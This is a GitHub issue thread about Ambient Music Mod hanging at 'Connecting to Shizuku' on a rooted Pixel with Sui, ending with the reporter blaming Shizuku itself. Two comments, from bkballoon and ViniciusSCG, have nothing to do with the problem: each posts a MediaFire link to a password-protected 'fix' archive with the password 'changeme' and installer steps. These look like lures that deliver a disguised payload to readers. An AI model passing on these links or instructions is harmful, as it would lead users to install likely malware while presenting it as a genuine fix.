### ISSUE TITLE
Stuck "Connecting to Shizuku" on rooted device with Sui installed

### ISSUE THREAD

**Issue by e-t-l** [KieronQuinn/AmbientMusicMod#262]
The Readme makes it sound pretty clear that this requires the Shizuku app OR the Sui magisk module, but not both. I flashed Sui and rebooted, yet when I open Ambient Music Mod and tap "Get started," it just says "Connecting to Shizuku" endlessly. I don't have Shizuku installed, do I need it if I already have Sui?

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by e-t-l** [comment]
Update: Well this is weird. I installed Shizuku too and started it (root), and granted Ambient Music Mod access to it, and it's STILL stuck on "connecting to Shizuku."

**Comment by KieronQuinn** [comment]
What device is this?

**Comment by e-t-l** [comment]
Pixel 8 Pro, but I think it was actually an issue with Shizuku, sorry. I noticed that another app that was granted Shizuku permission was also behaving as if it didn't have it. I'll reopen this issue if it turns out there's anything actionable to AMM.
